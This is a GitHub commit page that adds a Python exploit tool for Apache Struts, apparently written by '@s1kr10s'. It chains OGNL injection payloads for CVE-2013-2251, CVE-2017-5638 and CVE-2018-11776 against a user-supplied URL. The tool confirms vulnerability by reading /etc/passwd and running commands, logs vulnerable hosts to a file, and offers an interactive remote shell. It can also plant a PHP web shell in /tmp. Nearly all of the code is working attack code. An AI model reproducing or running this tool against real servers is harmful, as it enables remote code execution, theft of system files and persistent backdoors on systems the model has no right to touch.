Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
Browse files
Browse the repository at this point in the history
Add files via upload
- Loading branch information
Showing
2 changed files
with
220 additions
and
0 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,220 @@ | ||
#!/usr/bin/python | ||
|
||
import urllib2 | ||
import time | ||
import sys | ||
import os | ||
import commands | ||
import requests | ||
import readline | ||
import urlparse | ||
|
||
RED = '\033[1;31m' | ||
BLUE = '\033[94m' | ||
BOLD = '\033[1m' | ||
GREEN = '\033[32m' | ||
OTRO = '\033[36m' | ||
YELLOW = '\033[33m' | ||
ENDC = '\033[0m' | ||
|
||
def cls(): | ||
os.system(['clear', 'cls'][os.name == 'nt']) | ||
cls() | ||
|
||
logo = BLUE+''' | ||
___ _____ ___ _ _ _____ ___ | ||
( _`\(_ _)| _`\ ( ) ( )(_ _)( _`\ | ||
| (_(_) | | | (_) )| | | | | | | (_(_) | ||
`\__ \ | | | , / | | | | | | `\__ \ | ||
( )_) | | | | |\ \ | (_) | | | ( )_) | | ||
`\____) (_) (_) (_)(_____) (_) `\____) | ||
=[ Command Execution v3]= | ||
By @s1kr10s | ||
'''+ENDC | ||
print logo | ||
|
||
print " * Ejemplo: http(s)://www.victima.com/files.login\n" | ||
host = raw_input(BOLD+" [+] HOST: "+ENDC) | ||
|
||
if len(host) > 0: | ||
if host.find("https://") != -1 or host.find("http://") != -1: | ||
|
||
poc = "?redirect:${%23w%3d%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29.getWriter%28%29,%23w.println%28%27mamalo%27%29,%23w.flush%28%29,%23w.close%28%29}" | ||
|
||
def exploit(comando): | ||
exploit = "?redirect:${%23a%3d%28new%20java.lang.ProcessBuilder%28new%20java.lang.String[]{"+comando+"}%29%29.start%28%29,%23b%3d%23a.getInputStream%28%29,%23c%3dnew%20java.io.InputStreamReader%28%23b%29,%23d%3dnew%20java.io.BufferedReader%28%23c%29,%23e%3dnew%20char[50000],%23d.read%28%23e%29,%23matt%3d%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29,%23matt.getWriter%28%29.println%28%23e%29,%23matt.getWriter%28%29.flush%28%29,%23matt.getWriter%28%29.close%28%29}" | ||
return exploit | ||
|
||
def exploit2(comando): | ||
exploit2 = "Content-Type:%{(+++#_='multipart/form-data').(+++#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(+++#_memberAccess?(+++#_memberAccess=#dm):((+++#container=#context['com.opensymphony.xwork2.ActionContext.container']).(+++#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(+++#ognlUtil.getExcludedPackageNames().clear()).(+++#ognlUtil.getExcludedClasses().clear()).(+++#context.setMemberAccess(+++#dm)))).(+++#shell='"+str(comando)+"').(+++#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(+++#shells=(+++#iswin?{'cmd.exe','/c',#shell}:{'/bin/sh','-c',#shell})).(+++#p=new java.lang.ProcessBuilder(+++#shells)).(+++#p.redirectErrorStream(true)).(+++#process=#p.start()).(+++#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(+++#process.getInputStream(),#ros)).(+++#ros.flush())}" | ||
return exploit2 | ||
|
||
def exploit3(comando): | ||
exploit3 = "%24%7B%28%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D@java.lang.Runtime@getRuntime%28%29.exec%28%27"+comando+"%27%29.getInputStream%28%29%2C%23b%3Dnew%20java.io.InputStreamReader%28%23a%29%2C%23c%3Dnew%20%20java.io.BufferedReader%28%23b%29%2C%23d%3Dnew%20char%5B51020%5D%2C%23c.read%28%23d%29%2C%23sbtest%3D@org.apache.struts2.ServletActionContext@getResponse%28%29.getWriter%28%29%2C%23sbtest.println%28%23d%29%2C%23sbtest.close%28%29%29%7D" | ||
return exploit3 | ||
|
||
def pwnd(shellfile, ide): | ||
if ide == 1: | ||
exploitfile = "?redirect:${%23a%3d%28new%20java.lang.ProcessBuilder%28new%20java.lang.String[]{"+shellfile+"}%29%29.start%28%29,%23b%3d%23a.getInputStream%28%29,%23c%3dnew%20java.io.InputStreamReader%28%23b%29,%23d%3dnew%20java.io.BufferedReader%28%23c%29,%23e%3dnew%20char[50000],%23d.read%28%23e%29,%23matt%3d%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29,%23matt.getWriter%28%29.println%28%23e%29,%23matt.getWriter%28%29.flush%28%29,%23matt.getWriter%28%29.close%28%29}" | ||
elif ide == 3: | ||
exploitfile = "?redirect:%24%7B%28%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D@java.lang.Runtime@getRuntime%28%29.exec%28%27"+shellfile+"%27%29.getInputStream%28%29%2C%23b%3Dnew%20java.io.InputStreamReader%28%23a%29%2C%23c%3Dnew%20%20java.io.BufferedReader%28%23b%29%2C%23d%3Dnew%20char%5B51020%5D%2C%23c.read%28%23d%29%2C%23sbtest%3D@org.apache.struts2.ServletActionContext@getResponse%28%29.getWriter%28%29%2C%23sbtest.println%28%23d%29%2C%23sbtest.close%28%29%29%7D" | ||
return exploitfile | ||
|
||
def validador(): | ||
arr_lin_win = ["file%20/etc/passwd","dir","net%20users","id","/sbin/ifconfig","cat%20/etc/passwd"] | ||
return arr_lin_win | ||
|
||
#def reversepl(ip,port): | ||
# print "perl" | ||
|
||
#def reversepy(ip,port): | ||
# print "python" | ||
|
||
# CVE-2013-2251 --------------------------------------------------------------------------------- | ||
try: | ||
response = '' | ||
response = urllib2.urlopen(host+poc) | ||
except: | ||
print RED+" Servidor no responde\n"+ENDC | ||
exit(0) | ||
|
||
print BOLD+"\n [+] EJECUTANDO EXPLOIT CVE-2013-2251"+ENDC | ||
|
||
if response.read().find("mamalo") != -1: | ||
print RED+" [-] VULNERABLE"+ENDC | ||
owned = open('vulnsite.txt', 'a') | ||
owned.write(str(host)+'\n') | ||
owned.close() | ||
|
||
opcion = raw_input(YELLOW+" [-] RUN THIS EXPLOIT (s/n): "+ENDC) | ||
#print BOLD+" * [SHELL REVERSA]"+ENDC | ||
#print OTRO+" Struts@Shell:$ reverse 127.0.0.1 4444 (perl,python,bash)\n"+ENDC | ||
if opcion == 's': | ||
print YELLOW+" [-] GET PROMPT...\n"+ENDC | ||
time.sleep(1) | ||
print BOLD+" * [UPLOAD SHELL]"+ENDC | ||
print OTRO+" Struts@Shell:$ pwnd (php)\n"+ENDC | ||
|
||
while 1: | ||
separador = raw_input(GREEN+"Struts2@Shell_1:$ "+ENDC) | ||
espacio = separador.split(' ') | ||
comando = "','".join(espacio) | ||
|
||
if espacio[0] != 'reverse' and espacio[0] != 'pwnd': | ||
shell = urllib2.urlopen(host+exploit("'"+str(comando)+"'")) | ||
print "\n"+shell.read() | ||
elif espacio[0] == 'pwnd': | ||
pathsave=raw_input("path EJ:/tmp/: ") | ||
|
||
if espacio[1] == 'php': | ||
shellfile = """'python','-c','f%3dopen("/tmp/status.php","w");f.write("<?php%20system($_GET[ksujenenuhw])?>")'""" | ||
urllib2.urlopen(host+pwnd(str(shellfile))) | ||
shell = urllib2.urlopen(host+exploit("'ls','-l','"+pathsave+"status.php'")) | ||
if shell.read().find(pathsave+"status.php") != -1: | ||
print BOLD+GREEN+"\nCreate File Successfull :) ["+pathsave+"status.php]\n"+ENDC | ||
else: | ||
print BOLD+RED+"\nNo Create File :/\n"+ENDC | ||
|
||
# CVE-2017-5638 --------------------------------------------------------------------------------- | ||
print BLUE+" [-] NO VULNERABLE"+ENDC | ||
print BOLD+" [+] EJECUTANDO EXPLOIT CVE-2017-5638"+ENDC | ||
x = 0 | ||
while x < len(validador()): | ||
valida = validador()[x] | ||
req = urllib2.Request(host, None, {'User-Agent': 'Mozilla/5.0', 'Content-Type': exploit2(str(valida))}) | ||
result = urllib2.urlopen(req).read() | ||
|
||
if result.find("ASCII") != -1 or result.find("No such") != -1 or result.find("Directory of") != -1 or result.find("Volume Serial") != -1 or result.find("inet") != -1 or result.find("root:") != -1 or result.find("uid=") != -1 or result.find("accounts") != -1 or result.find("Cuentas") != -1: | ||
print RED+" [-] VULNERABLE"+ENDC | ||
owned = open('vulnsite.txt', 'a') | ||
owned.write(str(host)+'\n') | ||
owned.close() | ||
|
||
opcion = raw_input(YELLOW+" [-] RUN THIS EXPLOIT (s/n): "+ENDC) | ||
if opcion == 's': | ||
print YELLOW+" [-] GET PROMPT...\n"+ENDC | ||
time.sleep(1) | ||
|
||
while 1: | ||
try: | ||
separador = raw_input(GREEN+"\nStruts2@Shell_2:$ "+ENDC) | ||
req = urllib2.Request(host, None, {'User-Agent': 'Mozilla/5.0', 'Content-Type': exploit2(str(separador))}) | ||
result = urllib2.urlopen(req).read() | ||
print "\n"+result | ||
except: | ||
exit(0) | ||
else: | ||
x = len(validador()) | ||
else: | ||
print BLUE+" [-] NO VULNERABLE "+ENDC + "Payload: " + str(x) | ||
pass | ||
x=x+1 | ||
|
||
# CVE-2018-11776 --------------------------------------------------------------------------------- | ||
print BLUE+" [-] NO VULNERABLE"+ENDC | ||
print BOLD+" [+] EJECUTANDO EXPLOIT CVE-2018-11776"+ENDC | ||
x = 0 | ||
while x < len(validador()): | ||
#Filtramos la url solo dominio | ||
url = host.replace('#', '%23') | ||
url = host.replace(' ', '%20') | ||
if ('://' not in url): | ||
url = str("http://") + str(url) | ||
scheme = urlparse.urlparse(url).scheme | ||
site = scheme + '://' + urlparse.urlparse(url).netloc | ||
|
||
#Filtramos la url solo path | ||
file_path = urlparse.urlparse(url).path | ||
if (file_path == ''): | ||
file_path = '/' | ||
|
||
valida = validador()[x] | ||
result = requests.get(site+"/"+exploit3(str(valida))+file_path).text | ||
|
||
if result.find("ASCII") != -1 or result.find("No such") != -1 or result.find("Directory of") != -1 or result.find("Volume Serial") != -1 or result.find("inet") != -1 or result.find("root:") != -1 or result.find("uid=") != -1 or result.find("accounts") != -1 or result.find("Cuentas") != -1: | ||
print RED+" [-] VULNERABLE"+ENDC | ||
owned = open('vulnsite.txt', 'a') | ||
owned.write(str(host)+'\n') | ||
owned.close() | ||
|
||
opcion = raw_input(YELLOW+" [-] RUN THIS EXPLOIT (s/n): "+ENDC) | ||
if opcion == 's': | ||
print YELLOW+" [-] GET PROMPT...\n"+ENDC | ||
time.sleep(1) | ||
print BOLD+" * [UPLOAD SHELL]"+ENDC | ||
print OTRO+" Struts@Shell:$ pwnd (php)\n"+ENDC | ||
|
||
while 1: | ||
separador = raw_input(GREEN+"Struts2@Shell_3:$ "+ENDC) | ||
espacio = separador.split(' ') | ||
comando = "%20".join(espacio) | ||
|
||
if espacio[0] != 'reverse' and espacio[0] != 'pwnd': | ||
shell = urllib2.urlopen(host+exploit3(str(comando))) | ||
print "\n"+shell.read() | ||
elif espacio[0] == 'pwnd': | ||
pathsave=raw_input("path EJ:/tmp/: ") | ||
|
||
if espacio[1] == 'php': | ||
shellfile = """'python','-c','f%3dopen("/tmp/status.php","w");f.write("<?php%20system($_GET[ksujenenuhw])?>")'""" | ||
urllib2.urlopen(host+pwnd(str(shellfile))) | ||
shell = urllib2.urlopen(host+exploit3("'ls','-l','"+pathsave+"status.php'")) | ||
if shell.read().find(pathsave+"status.php") != -1: | ||
print BOLD+GREEN+"\nCreate File Successfull :) ["+pathsave+"status.php]\n"+ENDC | ||
else: | ||
print BOLD+RED+"\nNo Create File :/\n"+ENDC | ||
else: | ||
x = len(validador()) | ||
exit(0) | ||
else: | ||
print BLUE+" [-] NO VULNERABLE "+ENDC + "Payload: " + str(x) | ||
pass | ||
x=x+1 | ||
else: | ||
print RED+" Debe introducir el protocolo (https o http) para el dominio\n"+ENDC | ||
exit(0) | ||
else: | ||
print RED+" Debe Ingresar una Url\n"+ENDC | ||
exit(0) | ||
|
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.